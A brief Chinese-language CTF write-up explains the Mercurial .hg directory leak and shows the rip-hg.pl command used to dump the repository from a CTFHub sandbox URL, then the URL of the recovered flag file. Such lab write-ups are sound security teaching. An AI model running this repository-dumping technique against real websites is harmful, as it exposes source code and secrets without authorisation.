HG泄露

HG泄露

当开发人员使用 Mercurial 进行版本控制,对站点自动部署。如果配置不当,可能会将.hg 文件夹直接部署到线上环境。这就引起了 hg 泄露漏洞。

./rip-hg.pl -u http://challenge-a93378720f5e62ef.sandbox.ctfhub.com:10800/.hg/

flag_237051366.txt

http://challenge-a93378720f5e62ef.sandbox.ctfhub.com:10800/flag_237051366.txt